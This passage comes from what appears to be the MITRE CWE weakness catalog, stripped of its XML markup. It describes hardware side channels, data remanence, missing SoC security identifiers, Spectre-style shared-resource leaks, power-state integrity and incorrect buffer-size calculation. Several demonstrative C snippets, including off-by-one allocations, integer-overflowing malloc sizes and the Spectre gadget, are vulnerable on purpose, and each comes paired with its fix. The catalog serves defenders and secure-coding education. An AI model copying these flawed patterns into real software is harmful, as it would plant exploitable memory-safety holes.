that sole reliance on this method might not yield expected results [REF-1239] [REF-1240]. - Moderate - - - Manual Analysis - - Post-silicon, perform full side-channel attacks (penetration testing) covering as many known leakage models as possible against test code. - Moderate - - - Manual Analysis - - Pre-silicon - while the aforementioned TVLA methods can be performed post-silicon, models of device power consumption or other physical emanations can be built from information present at various stages of the hardware design process before fabrication. TVLA or known side-channel attacks can be applied to these simulated traces and countermeasures applied before tape-out. Academic research in this field includes [REF-1231] [REF-1232] [REF-1233]. - Moderate - - - - - Architecture and Design - Apply blinding or masking techniques to implementations of cryptographic algorithms. - - - Implementation - Add shielding or tamper-resistant protections to the device to increase the difficulty of obtaining measurements of the side-channel. - - - - - Consider a device that checks a - passcode to unlock the screen. - As each character of - the PIN number is entered, a correct character - exhibits one current pulse shape while an - incorrect character exhibits a different current - pulse shape. - PIN numbers used to unlock a cell phone - should not exhibit any characteristics about - themselves. This creates a side channel. An - attacker could monitor the pulses using an - oscilloscope or other method. Once the first - character is correctly guessed (based on the - oscilloscope readings), they can then move to the - next character, which is much more efficient than - the brute force method of guessing every possible - sequence of characters. - Rather than comparing - each character to the correct PIN value as it is - entered, the device could accumulate the PIN in a - register, and do the comparison all at once at the - end. Alternatively, the components for the - comparison could be modified so that the current - pulse shape is the same regardless of the - correctness of the entered - character. - - - Consider the device vulnerability CVE-2021-3011, which affects certain microcontrollers [REF-1221]. The Google Titan Security Key is used for two-factor authentication using cryptographic algorithms. The device uses an internal secret key for this purpose and exchanges information based on this key for the authentication. If this internal secret key and the encryption algorithm were known to an adversary, the key function could be duplicated, allowing the adversary to masquerade as the legitimate user. - The local method of extracting the secret key consists of plugging the key into a USB port and using electromagnetic (EM) sniffing tools and computers. - Several solutions could have been considered by the manufacturer. For example, the manufacturer could shield the circuitry in the key or add randomized delays, indirect calculations with random values involved, or randomly ordered calculations to make extraction much more difficult or a combination of these techniques. - - - - - CVE-2021-3011 - electromagnetic-wave side-channel in security-related microcontrollers allows extraction of private key - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011 - - - CVE-2013-4576 - message encryption software uses certain instruction sequences that allows RSA key extraction using a chosen-ciphertext attack and acoustic cryptanalysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4576 - - - CVE-2020-28368 - virtualization product allows recovery of AES keys from the guest OS using a side channel attack against a power/energy monitoring interface. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28368 - - - CVE-2019-18673 - power consumption varies based on number of pixels being illuminated in a display, allowing reading of secrets such as the PIN by using the USB interface to measure power consumption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18673 - - - - Power - - - - - - - - - - - - - - - - - - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-05-29 - - - CWE Content Team - MITRE - 2021-03-15 - updated Functional_Areas, Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - Anders Nordstrom, Alric Althoff - Tortuga Logic - 2021-10-11 - Provided detection methods, observed examples, and references - - - Nicole Fern - Riscure - 2021-10-13 - Provided detection methods, observed examples, and references - - - - - The product's data removal process does not completely delete all data and potentially sensitive information within hardware components. - - Physical properties of hardware devices, such as remanence of magnetic media, residual charge of ROMs/RAMs, or screen burn-in may still retain sensitive data after a data removal process has taken place and power is removed. - Recovering data after erasure or overwriting is possible due to a phenomenon called data remanence. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree such that even after the original data is erased that data can still be recovered through physical characterization of the memory cells. - - - - - - - - - - - - - Implementation - - - - - Confidentiality - Read Memory - Read Application Data - - - - - Architecture and Design - Apply blinding or masking techniques to implementations of cryptographic algorithms. - - - Implementation - Alter the method of erasure, add protection of media, or destroy the media to protect the data. - - - - - - - - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Nicole Fern - Tortuga Logic - 2020-05-29 - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier. - - In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute). A typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity) in addition to much more information in the message. Sometimes the transactions are qualified with a Security Identifier. This Security Identifier helps the destination agent decide on the set of allowed or disallowed actions. - A common weakness that can exist in such transaction schemes is that the source agent fails to include the necessary, security identifier with the transaction. Because of the missing security identifier, the destination agent might drop the message, thus resulting in Denial-of-Service (DoS), or get confused in its attempt to execute the given action, which confusion could result in privilege escalation or a gain of unintended access. - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - DoS: Crash, Exit, or Restart - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - High - - - - - Architecture and Design - Transaction details must be reviewed for design inconsistency and common weaknesses. - - - Implementation - Security identifier definition and programming flow must be tested in pre-silicon and post-silicon testing. - - - - - - Consider a system with a register for storing AES key for encryption or decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and the register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls. - The access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a security identifier. There could be a maximum of 32 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., “1”) allows for a respective action from an agent whose identity matches the number of the bit; if set to “0” (i.e., Clear), it disallows the respective action to that corresponding agent. - - - - - Register - Field description - - - AES_ENC_DEC_KEY_0 - AES key [0:31] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_1 - AES key [32:63] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_2 - AES key [64:95] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_4 - AES key [96:127] for encryption or decryption, Default 0x00000000 - - - AES_KEY_ACCESS_POLICY - [31:0] Default 0x00000004 – agent with Security Identifier “2” has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers - - - - The originator sends a transaction with no security identifier, i.e., meaning the value is “0” or NULL. The AES-Key-access register does not allow the necessary action and drops the transaction because the originator failed to include the required security identifier. - - - - Register - Field description - - - AES_ENC_DEC_KEY_0 - AES key [0:31] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_1 - AES key [32:63] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_2 - AES key [64:95] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_4 - AES key [96:127] for encryption or decryption, Default 0x00000000 - - - AES_KEY_ACCESS_POLICY - [31:0] Default 0x00000002 – agent with security identifier “2” has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers - - - - The originator should send a transaction with Security Identifier “2” which will allow access to the AES-Key-access register and allow encryption and decryption operations. - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-02-14 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts. - - Modern processors use techniques such as out-of-order execution, speculation, prefetching, data forwarding, and caching to increase performance. Details about the implementation of these techniques are hidden from the programmer’s view. This is problematic when the hardware implementation of these techniques results in resources being shared across supposedly isolated contexts. Contention for shared resources between different contexts opens covert channels that allow malicious programs executing in one context to recover information from another context. - - Some examples of shared micro-architectural resources that have been used to leak information between contexts are caches, branch prediction logic, and load or store buffers. Speculative and out-of-order execution provides an attacker with increased control over which data is leaked through the covert channel. - - If the extent of resource sharing between contexts in the design microarchitecture is undocumented, it is extremely difficult to ensure system assets are protected against disclosure. - - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. - - - - - Confidentiality - Read Application Data - Read Memory - Microarchitectural side-channels have been used to leak specific information such as cryptographic keys, and Address Space Layout Randomization (ALSR) offsets as well as arbitrary memory. - - - - - Architecture and Design - Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers. - - - Requirements - Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers. - - - - - - Secure programs perform bounds checking before accessing an array if the source of the array index is provided by an untrusted source such as user input. In the code below, data from array1 will not be accessed if x is out of bounds. However, if this code executes on a processor that performs speculative execution the outcome of the if statement could be mis-predicted and the access on the next line will occur with a value of x that can point to arbitrary locations in the program’s memory (out-of-bounds). - Even though the processor rolls back the architectural effects of the mis-predicted branch, the memory accesses alter data cache state, which is not rolled back after the branch is resolved. The cache state can reveal array1[x] thereby providing a mechanism to recover any word in this program’s memory space. - - - if (x < array1_size) - y = array2[array1[x] * 4096]; - - Code snippet is from the Spectre paper: https://spectreattack.com/spectre.pdf. - - - - - - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-05-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Related_Attack_Patterns - - - - - The product performs a power save/restore - operation, but it does not ensure that the integrity of - the configuration state is maintained and/or verified between - the beginning and ending of the operation. - - Before powering down, the Intellectual - Property (IP) saves current state (S) to persistent - storage such as flash or always-on memory in order to - optimize the restore operation. During this process, - an attacker with access to the persistent storage may - alter (S) to a configuration that could potentially - modify privileges, disable protections, and/or cause - damage to the hardware. If the IP does not validate - the configuration state stored in persistent memory, - upon regaining power or becoming operational again, - the IP could be compromised through the activation of - an unwanted/harmful configuration. - - - - - - - - - - - - - - - - Architecture and Design - Weakness introduced via missing internal integrity guarantees during power save/restore - - - Integration - Weakness introduced via missing external integrity verification during power save/restore - - - - - Confidentiality - Integrity - DoS: Instability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (Other) - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Alter Execution Logic - Quality Degradation - Unexpected State - Reduce Maintainability - Reduce Performance - Reduce Reliability - High - - - - - Architecture and Design - Inside the IP, incorporate integrity checking - on the configuration state via a cryptographic - hash. The hash can be protected inside the IP such as - by storing it in internal registers which never lose - power. Before powering down, the IP performs a hash of - the configuration and saves it in these persistent - registers. Upon restore, the IP performs a hash of the - saved configuration and compares it with the - saved hash. If they do not match, then the IP should - not trust the configuration. - - - Integration - Outside the IP, incorporate integrity checking - of the configuration state via a trusted agent. Before - powering down, the trusted agent performs a hash of the - configuration and saves the hash in persistent storage. - Upon restore, the IP requests the trusted agent - validate its current configuration. If the - configuration hash is invalid, then the IP should not - trust the configuration. - - - - Integration - Outside the IP, incorporate a protected - environment that prevents undetected modification of - the configuration state by untrusted agents. Before - powering down, a trusted agent saves the IP’s - configuration state in this protected location that - only it is privileged to. Upon restore, the trusted - agent loads the saved state into the IP. - - - - - - The following pseudo code demonstrates the - power save/restore workflow which may lead to weakness - through a lack of validation of the config state after - restore. - - - void save_config_state() - { - - void* cfg; - - cfg = get_config_state(); - save_config_state(cfg); - - go_to_sleep(); - - } - - void restore_config_state() - { - - void* cfg; - cfg = get_config_file(); - load_config_file(cfg); - - } - - The following pseudo-code is the proper workflow for the integrity checking mitigation: - - void save_config_state() - { - - void* cfg; - void* sha; - - cfg = get_config_state(); - save_config_state(cfg); - - // save hash(cfg) to trusted location - sha = get_hash_of_config_state(cfg); - save_hash(sha); - - go_to_sleep(); - - } - - void restore_config_state() - { - - void* cfg; - void* sha_1, sha_2; - - cfg = get_config_file(); - // restore hash of config from trusted memory - sha_1 = get_persisted_sha_value(); - - sha_2 = get_hash_of_config_state(cfg); - if (sha_1 != sha_2) - - assert_error_and_halt(); - - - load_config_file(cfg); - - } - - It must be noted that in the previous example of - good pseudo code, the memory (where the hash of the - config state is stored) must be trustworthy while the - hardware is between the power save and restore states. - - - - - Power - - - - - - - Accellera Systems Initiative - 2020-07-16 - - - CWE Content Team - MITRE - 2021-03-15 - updated Functional_Areas - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow. - - - - - - - - - - - - - - Implementation - - - High - - - Integrity - Availability - Confidentiality - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - Read Memory - Modify Memory - If the incorrect calculation is used in the context of memory allocation, then the software may create a buffer that is smaller or larger than expected. If the allocated buffer is smaller than expected, this could lead to an out-of-bounds read or write (CWE-119), possibly causing a crash, allowing arbitrary code execution, or exposing sensitive data. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis generally does not account for environmental considerations when reporting potential errors in buffer calculations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. - - High - Detection techniques for buffer-related errors are more mature than for most other weakness types. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Moderate - Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem. - - - Manual Analysis - Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program. - - High - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - Cost effective for partial coverage: - - - Source Code Quality Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Implementation - When allocating a buffer for the purpose of transforming, converting, or encoding an input, allocate enough memory to handle the largest possible encoding. For example, in a routine that converts "&" characters to "&amp;" for HTML entity encoding, the output buffer needs to be at least 5 times as large as the input buffer. - - - Implementation - - Understand the programming language's underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7] - Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation. - - - - Implementation - Input Validation - Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range. - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - When processing structured incoming data containing a size field followed by raw data, identify and resolve any inconsistencies between the size field and the actual size of the data (CWE-130). - - - Implementation - When allocating memory that uses sentinels to mark the end of a data structure - such as NUL bytes in strings - make sure you also include the sentinel in your calculation of the total amount of memory that must be allocated. - - - Implementation - Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. - Moderate - This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). Additionally, this only addresses potential overflow issues. Resource consumption / exhaustion issues are still possible. - - - Implementation - Use sizeof() on the appropriate data type to avoid CWE-467. - - - Implementation - Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. This will simplify validation and will reduce surprises related to unexpected casting. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Use libraries or frameworks that make it easier to handle numbers without unexpected consequences, or buffer allocation routines that automatically track buffer size. - Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106] - - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-61] [REF-60]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - Compilation or Build Hardening - Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - - - The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget. - - int i;unsigned int numWidgets;Widget **WidgetList; - numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {ExitError("Incorrect number of widgets requested!");}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf("WidgetList ptr=%p\n", WidgetList);for(i=0; i<numWidgets; i++) {WidgetList[i] = InitializeWidget();}WidgetList[numWidgets] = NULL;showWidgets(WidgetList); - - However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption. - - - The following image processing code allocates a table for images. - - img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... - - This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). - - - This example applies an encoding procedure to an input string and stores it into a buffer. - - char * copy_input(char *user_supplied_string){ - int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ - if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ - - - /* encode to &lt; */ - - - }else dst_buf[dst_index++] = user_supplied_string[i]; - }return dst_buf; - } - - The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. - - - The following code is intended to read an incoming packet from a socket and extract one or more headers. - - DataPacket *packet;int numHeaders;PacketHeader *headers; - sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; - if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); - - The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. - - - The following code attempts to save three different identification numbers into an array. The array is allocated from memory using a call to malloc(). - - int *id_sequence; - - /* Allocate space for an array of three ids. */ - - - id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1); - - /* Populate the id array. */ - - - id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531; - - The problem with the code above is the value of the size parameter used during the malloc() call. It uses a value of '3' which by definition results in a buffer of three bytes to be created. However the intention was to create a buffer that holds three ints, and in C, each int requires 4 bytes worth of memory, so an array of 12 bytes is needed, 4 bytes for each int. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space. The overflow would occur during the assignment of id_sequence[0] and would continue with the assignment of id_sequence[1] and id_sequence[2]. - The malloc() call could have used '3*sizeof(int)' as the value for the size parameter in order to allocate the correct amount of space required to store the three ints. - - - - - CVE-2004-1363 - substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363 - - - CVE-2004-0747 - substitution overflow: buffer overflow using expansion of environment variables - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0747 - - - CVE-2005-2103 - substitution overflow: buffer overflow using a large number of substitution strings - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2103 - - - CVE-2005-3120 - transformation overflow: product adds extra escape characters to incoming data, but does not account for them in the buffer length - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120 - - - CVE-2003-0899 - transformation overflow: buffer overflow when expanding ">" to "&gt;", etc. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0899 - - - CVE-2001-0334 - expansion overflow: buffer overflow using wildcards - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334 - - - CVE-2001-0248 - expansion overflow: long pathname + glob = overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0248 - - - CVE-2001-0249 - expansion overflow: long pathname + glob = overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0249 - - - CVE-2002-0184 - special characters in argument are not properly expanded - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0184 - - - CVE-2004-0434 - small length value leads to heap overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0434 - - - CVE-2002-1347 - multiple variants - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1347 - - - CVE-2005-0490 - needs closer investigation, but probably expansion-based - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0490 - - - CVE-2004-0940 - needs closer investigation, but probably expansion-based - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940 - - - CVE-2008-0599 - Chain: Language interpreter calculates wrong buffer size (CWE-131) by using "size = ptr ? X : Y" instead of "size = (ptr ? X : Y)" expression. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599 - - - - - Other length calculation error - - - INT30-C - Ensure that unsigned integer operations do not wrap - Imprecise - - - MEM35-C - Allocate sufficient memory for an object - CWE More Abstract - - - - - - - - - - - - - - - - - - - - - This is a broad category. Some examples include: - - - simple math errors, - incorrectly updating parallel counters, - not accounting for size differences when "transforming" one input to another format (e.g. URL canonicalization or other transformation that can generate a result that's larger than the original input, i.e. "expansion"). - - - This level of detail is rarely available in public reports, so it is difficult to find good examples. - - - This weakness may be a composite or a chain. It also may contain layering or perspective differences. - This issue may be associated with many different types of incorrect calculations (CWE-682), although the integer overflow (CWE-190) is probably the most prevalent. This can be primary to resource consumption problems (CWE-400), including uncontrolled memory allocation (CWE-789). However, its relationship with out-of-bounds buffer access (CWE-119) must also be considered. - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Maintenance_Notes, Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-07-17 - updated References - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Potential_Mitigations - - Other Length Calculation Error - - - - Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state. - - A System or System-on-Chip (SoC) that implements a boot process utilizing security mechanisms such as Root-of-Trust (RoT) typically starts by executing code from a Read-only-Memory (ROM) component. The code in ROM is immutable, hence any security vulnerabilities discovered in the ROM code can never be fixed for the systems that are already in use. - - A common weakness is that the ROM does not have the ability to patch if security vulnerabilities are uncovered after the system gets shipped. This leaves the system in a vulnerable state where an adversary can compromise the SoC. - - - - - - - - - - - - - - Architecture and Design - This issue could be introduced during hardware architecture and design and can be identified later during Testing. - - - Implementation - This issue could be introduced during implementation and can be identified later during Testing. - - - Integration - This issue could be introduced during 